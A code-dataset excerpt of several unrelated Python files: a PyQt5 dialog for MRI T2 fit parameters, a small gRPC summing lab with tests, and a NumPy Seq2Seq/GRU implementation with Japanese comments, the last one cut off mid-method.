if slice_pos in self.T2slices: dixon_slice = self.dixonSlices[self.T2slices.index(slice_pos)] else: dixon_slice = slice_pos roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) #df_t2 = self.t2_data_summary_df[roi_data, 'pixel_index','roi'].groupby('slice') dixon_data_query_df = self.dixon_data_summary_df.query('slice == {}'.format(str(dixon_slice))) # roi_image_layer[dixon_data_query_df.pixels] = dixon_data_query_df[roi_data]/dixon_data_query_df[roi_data].max() roi_image_layer[dixon_data_query_df.pixel_index] = dixon_data_query_df[roi_data] # self.img1[:,:,2] = roi_image_layer.reshape((self.numRowsT2,self.numColsT2)) self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer) else: roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer)
Python
375
35.482666
124
/ImageData.py
0.570474
0.557531
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'azz_fit_parameters_dialog.ui' # # Created by: PyQt5 UI code generator 5.6 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets class AzzT2paramsDialog(object): def __init__(self, lmparams): self.lmparams = lmparams self.params = self.lmparams['azzt2fitparams'] def setupAzzT2paramsDialog(self, Dialog): self.dialog = Dialog Dialog.setObjectName("Azzabou") Dialog.resize(398, 335) self.buttonBox = QtWidgets.QDialogButtonBox(Dialog) self.buttonBox.setGeometry(QtCore.QRect(230, 280, 156, 23)) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonBox.setObjectName("buttonBox") self.layoutWidget = QtWidgets.QWidget(Dialog) self.layoutWidget.setGeometry(QtCore.QRect(20, 10, 361, 252)) self.layoutWidget.setObjectName("layoutWidget") self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) self.gridLayout.setContentsMargins(0, 0, 0, 0) self.gridLayout.setObjectName("gridLayout") self.label_11 = QtWidgets.QLabel(self.layoutWidget) self.label_11.setObjectName("label_11") self.gridLayout.addWidget(self.label_11, 7, 0, 1, 1) self.label_12 = QtWidgets.QLabel(self.layoutWidget) self.label_12.setObjectName("label_12") self.gridLayout.addWidget(self.label_12, 8, 0, 1, 1) self.echoTimeValue = QtWidgets.QLineEdit(self.layoutWidget) self.echoTimeValue.setValidator(QtGui.QDoubleValidator()) self.echoTimeValue.setObjectName("echoTimeValue") self.gridLayout.addWidget(self.echoTimeValue, 8, 1, 1, 1) self.longFatT2value = QtWidgets.QLineEdit(self.layoutWidget) self.longFatT2value.setValidator(QtGui.QDoubleValidator()) self.longFatT2value.setObjectName("longFatT2value") self.gridLayout.addWidget(self.longFatT2value, 6, 1, 1, 1) self.shortFatT2value = QtWidgets.QLineEdit(self.layoutWidget) self.shortFatT2value.setValidator(QtGui.QDoubleValidator()) self.shortFatT2value.setObjectName("shortFatT2value") self.gridLayout.addWidget(self.shortFatT2value, 7, 1, 1, 1) self.label_2 = QtWidgets.QLabel(self.layoutWidget) self.label_2.setObjectName("label_2") self.gridLayout.addWidget(self.label_2, 0, 2, 1, 1) self.label_3 = QtWidgets.QLabel(self.layoutWidget) self.label_3.setObjectName("label_3") self.gridLayout.addWidget(self.label_3, 0, 3, 1, 1) self.muscleT2minimum = QtWidgets.QLineEdit(self.layoutWidget) self.muscleT2minimum.setValidator(QtGui.QDoubleValidator()) self.muscleT2minimum.setObjectName("muscleT2minimum") self.gridLayout.addWidget(self.muscleT2minimum, 1, 2, 1, 1) self.fatFractionMinimum = QtWidgets.QLineEdit(self.layoutWidget) self.fatFractionMinimum.setValidator(QtGui.QDoubleValidator()) self.fatFractionMinimum.setObjectName("fatFractionMinimum") self.gridLayout.addWidget(self.fatFractionMinimum, 3, 2, 1, 1) self.fatFractionMaximum = QtWidgets.QLineEdit(self.layoutWidget) self.fatFractionMaximum.setValidator(QtGui.QDoubleValidator()) self.fatFractionMaximum.setObjectName("fatFractionMaximum") self.gridLayout.addWidget(self.fatFractionMaximum, 3, 3, 1, 1) self.muscleFractionMinimum = QtWidgets.QLineEdit(self.layoutWidget) self.muscleFractionMinimum.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMinimum.setObjectName("muscleFractionMinimum") self.gridLayout.addWidget(self.muscleFractionMinimum, 2, 2, 1, 1) self.optimizeMuscleFraction = QtWidgets.QCheckBox(self.layoutWidget) self.optimizeMuscleFraction.setText("") self.optimizeMuscleFraction.setChecked(True) self.optimizeMuscleFraction.setObjectName("optimizeMuscleFraction") self.gridLayout.addWidget(self.optimizeMuscleFraction, 2, 4, 1, 1) self.muscleFractionMaximum = QtWidgets.QLineEdit(self.layoutWidget) self.muscleFractionMaximum.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMaximum.setObjectName("muscleFractionMaximum") self.gridLayout.addWidget(self.muscleFractionMaximum, 2, 3, 1, 1) self.optimizeFatFraction = QtWidgets.QCheckBox(self.layoutWidget) self.optimizeFatFraction.setText("") self.optimizeFatFraction.setChecked(True) self.optimizeFatFraction.setObjectName("optimizeFatFraction") self.gridLayout.addWidget(self.optimizeFatFraction, 3, 4, 1, 1) self.label_7 = QtWidgets.QLabel(self.layoutWidget) self.label_7.setObjectName("label_7") self.gridLayout.addWidget(self.label_7, 3, 0, 1, 1) self.label_8 = QtWidgets.QLabel(self.layoutWidget) self.label_8.setObjectName("label_8") self.gridLayout.addWidget(self.label_8, 4, 0, 1, 1) self.optimizeMuscleT2 = QtWidgets.QCheckBox(self.layoutWidget) self.optimizeMuscleT2.setText("") self.optimizeMuscleT2.setChecked(True) self.optimizeMuscleT2.setObjectName("optimizeMuscleT2") self.gridLayout.addWidget(self.optimizeMuscleT2, 1, 4, 1, 1) self.fatFractionLongT2value = QtWidgets.QLineEdit(self.layoutWidget) self.fatFractionLongT2value.setValidator(QtGui.QDoubleValidator()) self.fatFractionLongT2value.setObjectName("fatFractionLongT2value") self.gridLayout.addWidget(self.fatFractionLongT2value, 4, 1, 1, 1) self.label_4 = QtWidgets.QLabel(self.layoutWidget) self.label_4.setObjectName("label_4") self.gridLayout.addWidget(self.label_4, 0, 4, 1, 1) self.muscleT2value = QtWidgets.QLineEdit(self.layoutWidget) self.muscleT2value.setObjectName("muscleT2value") self.gridLayout.addWidget(self.muscleT2value, 1, 1, 1, 1) self.fatFractionShortT2value = QtWidgets.QLineEdit(self.layoutWidget) self.fatFractionShortT2value.setValidator(QtGui.QDoubleValidator()) self.fatFractionShortT2value.setObjectName("fatFractionShortT2value") self.gridLayout.addWidget(self.fatFractionShortT2value, 5, 1, 1, 1) self.label_5 = QtWidgets.QLabel(self.layoutWidget) self.label_5.setObjectName("label_5") self.gridLayout.addWidget(self.label_5, 1, 0, 1, 1) self.label_6 = QtWidgets.QLabel(self.layoutWidget) self.label_6.setObjectName("label_6") self.gridLayout.addWidget(self.label_6, 2, 0, 1, 1) self.label_9 = QtWidgets.QLabel(self.layoutWidget) self.label_9.setObjectName("label_9") self.gridLayout.addWidget(self.label_9, 5, 0, 1, 1) self.muscleT2maximum = QtWidgets.QLineEdit(self.layoutWidget) self.muscleT2maximum.setValidator(QtGui.QDoubleValidator()) self.muscleT2maximum.setObjectName("muscleT2maximum") self.gridLayout.addWidget(self.muscleT2maximum, 1, 3, 1, 1) self.label_10 = QtWidgets.QLabel(self.layoutWidget) self.label_10.setObjectName("label_10") self.gridLayout.addWidget(self.label_10, 6, 0, 1, 1) self.muscleFractionValue = QtWidgets.QLineEdit(self.layoutWidget) self.muscleFractionValue.setValidator(QtGui.QDoubleValidator()) self.muscleFractionValue.setObjectName("muscleFractionValue") self.gridLayout.addWidget(self.muscleFractionValue, 2, 1, 1, 1) self.label = QtWidgets.QLabel(self.layoutWidget) self.label.setObjectName("label") self.gridLayout.addWidget(self.label, 0, 1, 1, 1) self.fatFractionValue = QtWidgets.QLineEdit(self.layoutWidget) self.fatFractionValue.setValidator(QtGui.QDoubleValidator()) self.fatFractionValue.setObjectName("fatFractionValue") self.gridLayout.addWidget(self.fatFractionValue, 3, 1, 1, 1) self.retranslateUi(Dialog) self.buttonBox.accepted.connect(self.dialog_ok_clicked) self.buttonBox.rejected.connect(Dialog.reject) QtCore.QMetaObject.connectSlotsByName(Dialog) def retranslateUi(self, Dialog): _translate = QtCore.QCoreApplication.translate Dialog.setWindowTitle(_translate("Azzabou", "Azzabout T2 model")) self.label_11.setText(_translate("Azzabou", "Short Fat T<sub>2</sub> (ms)")) self.label_12.setText(_translate("Azzabou", "Echo Time (ms)")) self.echoTimeValue.setText(_translate("Azzabou", "10.0")) self.longFatT2value.setText(_translate("Azzabou", "250.0")) self.shortFatT2value.setText(_translate("Azzabou", "43.0")) self.label_2.setText(_translate("Azzabou", "minimum")) self.label_3.setText(_translate("Azzabou", "maximum")) self.muscleT2minimum.setText(_translate("Azzabou", "0.0")) self.fatFractionMinimum.setText(_translate("Azzabou", "0.0")) self.fatFractionMaximum.setText(_translate("Azzabou", "10.0")) self.muscleFractionMinimum.setText(_translate("Azzabou", "0.0")) self.muscleFractionMaximum.setText(_translate("Azzabou", "10.0")) self.label_7.setText(_translate("Azzabou", "Fat Fraction")) self.label_8.setText(_translate("Azzabou", "Fat Fraction (Long T<sub>2</sub>)")) self.fatFractionLongT2value.setText(_translate("Azzabou", "0.6")) self.label_4.setText(_translate("Azzabou", "optimized")) self.muscleT2value.setText(_translate("Azzabou", "35.0")) self.fatFractionShortT2value.setText(_translate("Azzabou", "0.4")) self.label_5.setText(_translate("Azzabou", "Muscle T<sub>2</sub> (ms)")) self.label_6.setText(_translate("Azzabou", "Muscle Fraction")) self.label_9.setText(_translate("Azzabou", "Fat Fraction (Short T<sub>2</sub>)")) self.muscleT2maximum.setText(_translate("Azzabou", "100.0")) self.label_10.setText(_translate("Azzabou", "Long Fat T<sub>2</sub> (ms)")) self.muscleFractionValue.setText(_translate("Azzabou", "0.8")) self.label.setText(_translate("Azzabou", "value")) self.fatFractionValue.setText(_translate("Azzabou", "0.2")) def dialog_ok_clicked(self): print("dialog_ok_clicked") self.dialog.setResult(1) worked =self.get_fitparameters() if worked: self.params.pretty_print() self.dialog.accept() def get_fitparameters( self ): print("self.optimizeFatFraction.isChecked()", self.optimizeFatFraction.isChecked() ) #epgt2fitparams = lm.Parameters() worked = True try: self.params.add(name='T2muscle', value = float(self.muscleT2value.text()), min = float(self.muscleT2minimum.text()), max = float(self.muscleT2maximum.text()), vary = self.optimizeMuscleT2.isChecked()) self.params.add(name='Amuscle', value = float(self.muscleFractionValue.text()), min = float(self.muscleFractionMinimum.text()), max = float(self.muscleFractionMaximum.text()), vary = self.optimizeMuscleFraction.isChecked()) self.params.add(name='Afat', value = float(self.fatFractionValue.text()), min = float(self.fatFractionMinimum.text()), max = float(self.fatFractionMaximum.text()), vary = self.optimizeFatFraction.isChecked()) self.params.add(name='c_l', value=float(self.fatFractionLongT2value.text()), vary=False) self.params.add(name='c_s', value=float(self.fatFractionShortT2value.text()), vary=False) self.params.add(name='t2_fl', value=float(self.longFatT2value.text()), vary=False) self.params.add(name='t2_fs', value=float(self.shortFatT2value.text()), vary=False) self.params.add(name='echo', value=float(self.echoTimeValue.text()), vary=False) buttonsUnChecked = [not self.optimizeFatFraction.isChecked(), not self.optimizeMuscleFraction.isChecked(), not self.optimizeMuscleT2.isChecked()] print(buttonsUnChecked) if all(buttonsUnChecked): print("all buttuns unchecked") worked=False self.lmparams['azzt2fitparams'] = self.params except: print("exception occurred") worked = False return worked if __name__ == "__main__": import sys import lmfit as lm lmparams = {} epgt2fitparams = lm.Parameters() azzt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.20, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.80, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) azzt2fitparams.add_many(('Afat', 60.0, True, 0, 250, None), ('Amuscle', 40.0, True, 0, 250, None), ('T2muscle', 40.0, True, 0, 100, None), ('c_l', 0.55, False, 0, 2000, None), ('c_s', 0.45, False, 0, 2000, None), ('t2_fl', 250.0, False, 0, 2000, None), ('t2_fs', 43.0, False, 0, 2000, None), ('echo', 10.0, False, 0, 2000, None)) lmparams['epgt2fitparams'] = epgt2fitparams lmparams['azzt2fitparams'] = azzt2fitparams app = QtWidgets.QApplication(sys.argv) Azzabou = QtWidgets.QDialog() ui = AzzT2paramsDialog(lmparams) ui.setupAzzT2paramsDialog(Azzabou) Azzabou.show() sys.exit(app.exec_())
Python
302
47.052979
106
/azzT2paramsDialog.py
0.634854
0.604279
mgh35/lab-grpc
refs/heads/master
from concurrent import futures from generated import summer_pb2, summer_pb2_grpc import grpc import logging class SummerServicer(summer_pb2_grpc.SummerServicer): def Sum(self, request: summer_pb2.ToSum, context): logging.info("SummerServicer.Sum(%s)", request) s = sum(request.values) return summer_pb2.Summed(sum=s) def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) summer_pb2_grpc.add_SummerServicer_to_server( SummerServicer(), server) server.add_insecure_port('[::]:50051') server.start() server.wait_for_termination() if __name__ == "__main__": logging.basicConfig(level=logging.INFO) serve()
Python
26
25.807692
68
/summer-grpc/server.py
0.691535
0.672884
mgh35/lab-grpc
refs/heads/master
from generated.summer_pb2 import ToSum import pytest @pytest.mark.parametrize(["values", "expected"], [ ([], 0), ([1.0], 1.0), ([1.0, 1.0], 2.0), ]) def test_some(grpc_stub, values, expected): response = grpc_stub.Sum(ToSum(values=values)) assert response.sum == pytest.approx(expected)
Python
12
24.75
50
/summer-grpc/test_server.py
0.63754
0.598706
mgh35/lab-grpc
refs/heads/master
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc from generated import summer_pb2 as generated_dot_summer__pb2 class SummerStub(object): """Missing associated documentation comment in .proto file""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.Sum = channel.unary_unary( '/Summer/Sum', request_serializer=generated_dot_summer__pb2.ToSum.SerializeToString, response_deserializer=generated_dot_summer__pb2.Summed.FromString, ) class SummerServicer(object): """Missing associated documentation comment in .proto file""" def Sum(self, request, context): """Missing associated documentation comment in .proto file""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_SummerServicer_to_server(servicer, server): rpc_method_handlers = { 'Sum': grpc.unary_unary_rpc_method_handler( servicer.Sum, request_deserializer=generated_dot_summer__pb2.ToSum.FromString, response_serializer=generated_dot_summer__pb2.Summed.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'Summer', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class Summer(object): """Missing associated documentation comment in .proto file""" @staticmethod def Sum(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/Summer/Sum', generated_dot_summer__pb2.ToSum.SerializeToString, generated_dot_summer__pb2.Summed.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata)
Python
64
34.203125
91
/summer-grpc/generated/summer_pb2_grpc.py
0.633822
0.630271
mgh35/lab-grpc
refs/heads/master
from generated import summer_pb2, summer_pb2_grpc import grpc import sys import typing def run(values: typing.List[int]): with grpc.insecure_channel('localhost:50051') as channel: stub = summer_pb2_grpc.SummerStub(channel) summed = stub.Sum(summer_pb2.ToSum(values=values)) print(summed) if __name__ == "__main__": values = [float(_) for _ in sys.argv[1:]] run(values)
Python
17
23.117647
61
/summer-grpc/client.py
0.658537
0.634146
mgh35/lab-grpc
refs/heads/master
import pytest @pytest.fixture(scope='module') def grpc_add_to_server(): from generated.summer_pb2_grpc import add_SummerServicer_to_server return add_SummerServicer_to_server @pytest.fixture(scope='module') def grpc_servicer(): from server import SummerServicer return SummerServicer() @pytest.fixture(scope='module') def grpc_stub_cls(grpc_channel): from generated.summer_pb2_grpc import SummerStub return SummerStub
Python
19
22.578947
70
/summer-grpc/conftest.py
0.754464
0.75
yukojima424/deliverable
refs/heads/master
# AttentionおよびGRU搭載型Seq2Seqの構築 # 概要 # Seq2SeqにAttention層を加え、さらに通常のRNNやLSTMではなくGRUを搭載したものを構築 import sys sys.path.append('../kojimayu') import numpy as np import matplotlib.pyplot as plt import time import pickle import os import os.path # データをIDに、IDをデータにするものの枠を作る。 id_to_char = {} char_to_id = {} def _update_vocab(txt): chars = list(txt) for i, char in enumerate(chars): # 新しいデータであれば更新する。 if char not in char_to_id: tmp_id = len(char_to_id) char_to_id[char] = tmp_id id_to_char[tmp_id] = char def load_data(file_name='date.txt', seed=1984): file_path = '../kojimayu/date/' + file_name # 自身のローカルで行うため、パスは自身のもので構築している。 if not os.path.exists(file_path): print('No file: %s' % file_name) return None questions, answers = [], [] for line in open(file_path, 'r'): idx = line.find('_') questions.append(line[:idx]) answers.append(line[idx:-1]) for i in range(len(questions)): q, a = questions[i], answers[i] _update_vocab(q) _update_vocab(a) # x(入力データ)とt(正解ラベル)の配列を作る。 x = np.zeros((len(questions), len(questions[0])), dtype=np.int) t = np.zeros((len(questions), len(answers[0])), dtype=np.int) for i, sentence in enumerate(questions): x[i] = [char_to_id[c] for c in list(sentence)] for i, sentence in enumerate(answers): t[i] = [char_to_id[c] for c in list(sentence)] # 乱数によりデータをシャッフルする。 indices = np.arange(len(x)) if seed is not None: np.random.seed(seed) np.random.shuffle(indices) x = x[indices] t = t[indices] # 8:2の割合で訓練データとテストデータを分ける。 split_at = len(x) - len(x) // 5 (x_train, x_test) = x[:split_at], x[split_at:] (t_train, t_test) = t[:split_at], t[split_at:] return (x_train, t_train), (x_test, t_test) def get_vocab(): return char_to_id, id_to_char # Adam class Adam: def __init__(self, lr=0.001, beta1=0.9, beta2=0.999): self.lr = lr self.beta1 = beta1 self.beta2 = beta2 self.iter = 0 self.m = None self.v = None def update(self, params, grads): if self.m is None: self.m, self.v = [], [] for param in params: self.m.append(np.zeros_like(param)) self.v.append(np.zeros_like(param)) self.iter += 1 lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter) for i in range(len(params)): self.m[i] += (1 - self.beta1) * (grads[i] - self.m[i]) self.v[i] += (1 - self.beta2) * (grads[i]**2 - self.v[i]) params[i] -= lr_t * self.m[i] / (np.sqrt(self.v[i]) + 1e-7) # Trainer class Trainer: def __init__(self, model, optimizer): self.model = model self.optimizer = optimizer self.loss_list = [] self.eval_interval = None self.current_epoch = 0 def fit(self, x, t, max_epoch=10, batch_size=32, max_grad=None, eval_interval=20): data_size = len(x) max_iters = data_size // batch_size self.eval_interval = eval_interval model, optimizer = self.model, self.optimizer total_loss = 0 loss_count = 0 start_time = time.time() for epoch in range(max_epoch): # シャッフル idx = np.random.permutation(np.arange(data_size)) x = x[idx] t = t[idx] for iters in range(max_iters): batch_x = x[iters * batch_size:(iters+1) * batch_size] batch_t = t[iters * batch_size:(iters+1) * batch_size] # 勾配を求め、パラメータを更新 loss = model.forward(batch_x, batch_t) model.backward() params, grads = remove_duplicate(model.params, model.grads) # 共有された重みを1つに集約 if max_grad is not None: clip_grads(grads, max_grad) # 勾配爆発への対策メソッド 勾配クリッピングという optimizer.update(params, grads) total_loss += loss loss_count += 1 # 評価 if (eval_interval is not None) and (iters % eval_interval) == 0: avg_loss = total_loss / loss_count elapsed_time = time.time() - start_time print('| epoch %d | iter %d / %d | time %d[s] | loss %.2f' % (self.current_epoch + 1, iters + 1, max_iters, elapsed_time, avg_loss)) self.loss_list.append(float(avg_loss)) total_loss, loss_count = 0, 0 self.current_epoch += 1 def plot(self, ylim=None): x = np.arange(len(self.loss_list)) if ylim is not None: plt.ylim(*ylim) plt.plot(x, self.loss_list, label='train') plt.xlabel('iterations (x' + str(self.eval_interval) + ')') plt.ylabel('loss') plt.show() def clip_grads(grads, max_norm): total_norm = 0 for grad in grads: total_norm += np.sum(grad ** 2) total_norm = np.sqrt(total_norm) rate = max_norm / (total_norm + 1e-6) if rate < 1: for grad in grads: grad *= rate def remove_duplicate(params, grads): params, grads = params[:], grads[:] # copy list ※中身は複製されない※ while True: find_flg = False L = len(params) for i in range(0, L - 1): for j in range(i + 1, L): # 重みを共有する場合 if params[i] is params[j]: # params が同じものを探している(同じである場合の処理は以下) grads[i] += grads[j] # 勾配の加算 find_flg = True params.pop(j) # pop() は削除を意味する grads.pop(j) # pop() は削除を意味する # 転置行列として重みを共有する場合(weight tying) elif params[i].ndim == 2 and params[j].ndim == 2 and params[i].T.shape == params[j].shape and np.all(params[i].T == params[j]): # np.all() は()内の条件を満たすか確認している grads[i] += grads[j].T find_flg = True params.pop(j) # pop() は削除を意味する grads.pop(j) # pop() は削除を意味する if find_flg: break if find_flg: break if not find_flg: break return params, grads # couting program def eval_seq2seq(model, question, correct, id_to_char, verbose=False, is_reverse=False): correct = correct.flatten() # 頭の区切り文字 start_id = correct[0] correct = correct[1:] guess = model.generate(question, start_id, len(correct)) # 文字列への変換 question = ''.join([id_to_char[int(c)] for c in question.flatten()]) # 質問文 correct = ''.join([id_to_char[int(c)] for c in correct]) # 実際の解答 guess = ''.join([id_to_char[int(c)] for c in guess]) # 解答文(文章生成文) if verbose: if is_reverse: question = question[::-1] # question の並びを逆にする colors = {'ok': '\033[92m', 'fail': '\033[91m', 'close': '\033[0m'} # 色の指定 print('Q', question) print('T', correct) is_windows = os.name == 'nt' if correct == guess: # 実際の解答と生成した解答が合ってた場合 mark = colors['ok'] + '☑' + colors['close'] if is_windows: mark = '0' print(mark + ' ' + guess) else: # その他の場合(不正解の場合) mark = colors['fail'] + '☒' + colors['close'] if is_windows: mark = 'X' print(mark + ' ' + guess) print('---') return 1 if guess == correct else 0 # 正解していたら1を返し、不正解なら0を返す # build layers def softmax(x): if x.ndim == 2: x = x - x.max(axis=1, keepdims=True) # keepdims=True とは元の配列に対してブロードキャストを正しく適用させ演算する x = np.exp(x) x /= x.sum(axis=1, keepdims=True) elif x.ndim == 1: x = x - np.max(x) x = np.exp(x) / np.sum(np.exp(x)) return x def sigmoid(x): return 1 / (1 + np.exp(-x)) class TimeSoftmaxWithLoss: def __init__(self): self.params, self.grads = [], [] self.cache = None self.ignore_label = -1 def forward(self, xs, ts): N, T, V = xs.shape if ts.ndim == 3: # 教師ラベルが one_hot_vector の場合 正解のインデックスに変換 ts = ts.argmax(axis=2) mask = (ts != self.ignore_label) # ts が-1でない時(self.ignore_label の数値でない時) # バッチ分と時系列分を乗算でまとめる xs = xs.reshape(N * T, V) ts = ts.reshape(N * T) mask = mask.reshape(N * T) ys = softmax(xs) ls = np.log(ys[np.arange(N * T), ts]) ls *= mask # ignore_label に該当するものは損失を 0 にする (mask の対象外で計算されない) loss = -np.sum(ls) # 各時刻ごとの損失 ls を加算していく loss /= mask.sum() # 損失の平均値を出す self.cache = (ts, ys, mask, (N, T, V)) return loss def backward(self, dout=1): ts, ys, mask, (N, T, V) = self.cache dx = ys dx[np.arange(N * T), ts] -= 1 # 該当する dx のインデックスにある要素全てに対して -1 する dx *= dout dx /= mask.sum() dx *= mask[:, np.newaxis] # [:, np.newaxis] により次元を1つ追加 # mask により ignore_label に該当するものは損失を 0 にする (mask の対象外で計算されない) dx = dx.reshape((N, T, V)) # 入力データ(N, T, D)と同様の形に整形 return dx class TimeAffine: def __init__(self, W, b): self.params = [W, b] self.grads = [np.zeros_like(W), np.zeros_like(b)] self.x = None def forward(self, x): N, T, D = x.shape W, b = self.params rx = x.reshape(N * T, -1) # x の配列を N*T 行 にする (-1 は元の形状から推測して作られるという指定,今回なら列の長さが対象) out = np.dot(rx, W) + b # 全てをまとめて計算し,出力層へ self.x = x return out.reshape(N, T, -1) # -1 は元の形状から推測して作られるという指定, 今回なら3次元目が対象 def backward(self, dout): x = self.x N, T, D = x.shape W, b = self.params dout = dout.reshape(N * T, -1) rx = x.reshape(N * T, -1) db = np.sum(dout, axis=0) # 列方向に(axis=0) dout を加算 dW = np.dot(rx.T, dout) # 転置(.T)して計算 dx = np.dot(dout, W.T) # 転置(.T)して計算 dx = dx.reshape(* x.shape) # x の形状に変換 self.grads[0][...] = dW self.grads[1][...] = db return dx class Embedding: def __init__(self, W): self.params = [W] self.grads = [np.zeros_like(W)] # W と同じ形状の配列で全ての要素0にする self.idx = None # idx は重み(単語の分散表現)を取り出すときに使う数値 # idx には単語idを配列として格納していく def forward(self, idx): W, = self.params self.idx = idx out = W[idx] return out def backward(self, dout): dW, = self.grads dW[...] = 0 # dW の形状を維持したまま、要素を0にする np.add.at(dW, self.idx, dout) # np.add.at(A, idx, B) → B を A に加算し、加算を行う A の行を idx によって指定する # つまり指定した重み(単語の分散表現)に対してだけ加算を行う (重複した idx があっても加算により正しく処理) # optimizer を使用するなら dW[self.idx] = dout return None class TimeEmbedding: def __init__(self, W): self.params = [W] self.grads = [np.zeros_like(W)] self.layers = None self.W = W def forward(self, xs): N, T = xs.shape V, D = self.W.shape out = np.empty((N, T, D), dtype='f') self.layers = [] for t in range(T): layer = Embedding(self.W) out[:, t, :] = layer.forward(xs[:, t]) # 各時刻ごとの重みを取り出し,該当する out に入れる self.layers.append(layer) return out def backward(self, dout): N, T, D = dout.shape grad = 0 for t in range(T): layer = self.layers[t] layer.backward(dout[:, t, :]) grad += layer.grads[0] # grad を加算していく self.grads[0][...] = grad # 最終的な勾配 grad を上書き return None # Attention and GRU class GRU: def __init__(self, Wx, Wh, b): self.params = [Wx, Wh, b] self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)] self.cache = None def forward(self, x, h_prev): ''' それぞれのデータの形状は以下の通り(計算上最後に求める形状に問題がない事が分かる) 各パラメータは3つ分を集約 x = N * D , Wx = D * 3H h_prev = N * H , Wh = H * 3H , b = 1 * 3H ''' Wx, Wh, b = self.params H = Wh.shape[0] # Wx, Wh のパラメータを3つに分ける(z, r, h) Wxz, Wxr, Wxh = Wx[:, :H], Wx[:, H:2 * H], Wx[:, 2 * H:] Whz, Whr, Whh = Wh[:, :H], Wh[:, H:2 * H], Wh[:, 2 * H:] bz, br, bh = b[:H], b[H:2 * H], b[2 * H:] # GRU 内部の要素である z, r, h_hat を公式で算出 z = sigmoid(np.dot(x, Wxz) + np.dot(h_prev, Whz) + bz) r = sigmoid(np.dot(x, Wxr) + np.dot(h_prev, Whr) + br) h_hat = np.tanh(np.dot(x, Wxh) + np.dot(r * h_prev, Whh) + bh) # z, r, h_hat を使い h_next を公式で算出(GRU の最後の計算) h_next = (1 - z) * h_prev + z * h_hat self.cache = (x, h_prev, z, r, h_hat) return h_next def backward(self, dh_next): Wx, Wh, b = self.params H = Wh.shape[0] # forward と同様にパラメータを3つに分ける(z, r, h) <ただしバイアスはいらない> Wxz, Wxr, Wxh = Wx[:, :H], Wx[:, H:2 * H], Wx[:, 2 * H:] Whz, Whr, Whh = Wh[:, :H], Wh[:, H:2 * H], Wh[:, 2 * H:] x, h_prev, z, r, h_hat = self.cache # forward で行った計算の逆伝播 dh_hat = dh_next * z dh_prev = dh_next * (1 - z) # ① # dh_hat の逆伝播 <np.tanh() の逆伝播> dt = dh_hat * (1 - h_hat ** 2) dbh = np.sum(dt, axis=0) # bh の勾配 : (H,) の形状に戻すために axis=0 方向に合計 dWhh = np.dot((r * h_prev).T, dt) # Wh の勾配 : 転置を行い乗算 dhr = np.dot(dt, Whh.T) # (r * h_prev) の勾配 : 転置を行い乗算 dWxh = np.dot(x.T, dt) # Wxh の勾配 : 転置を行い乗算 dx = np.dot(dt, Wxh.T) # x の勾配 : 転置を行い乗算 dh_prev += r * dhr # ①で出した dh_prev に加算 # z の backward dz = dh_next * h_hat - dh_next * h_prev # h_next の算出計算の逆伝播 dt = dz * z * (1 - z) # sigmoid の逆伝播公式 dbz = np.sum(dt, axis=0) dWhz = np.dot(h_prev.T, dt) dh_prev += np.dot(dt, Whz.T) # ①で出した dh_prev に加算 dWxz = np.dot(x.T, dt) dx += np.dot(dt, Wxz.T) # dx をまとめるため加算 # r の backward dr = dhr * h_prev dt = dr * r * (1 - r) # sigmoid の逆伝播 dbr = np.sum(dt, axis=0) dWhr = np.dot(h_prev.T, dt) dh_prev += np.dot(dt, Whr.T) dWxr = np.dot(x.T, dt) dx += np.dot(dt, Wxr.T) # dx をまとめるため加算 # 引数に与えた配列を横方向に連結 (縦方向に連結する時 np.vstack()) self.dWx = np.hstack((dWxz, dWxr, dWxh)) self.dWh = np.hstack((dWhz, dWhr, dWhh)) self.db = np.hstack((dbz, dbr, dbh)) # grads を上書き self.grads[0][...] = self.dWx self.grads[1][...] = self.dWh self.grads[2][...] = self.db return dx, dh_prev class TimeGRU: def __init__(self, Wx, Wh, b, stateful=False): self.params = [Wx, Wh, b] self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)] self.layers = None self.h, self.dh = None, None self.stateful = stateful def forward(self, xs): Wx, Wh, b = self.params N, T, D = xs.shape H = Wh.shape[0] self.layers = [] hs = np.empty((N, T, H), dtype='f') if not self.stateful or self.h is None: self.h = np.zeros((N, H), dtype='f') for t in range(T): # T回繰り返す(時系列データ分) layer = GRU(* self.params) self.h = layer.forward(xs[:, t, :], self.h) hs[:, t, :] = self.h self.layers.append(layer) return hs def backward(self, dhs): Wx, Wh, b = self.params N, T, H = dhs.shape D = Wx.shape[0] dxs = np.empty((N, T, D), dtype='f') dh = 0 grads = 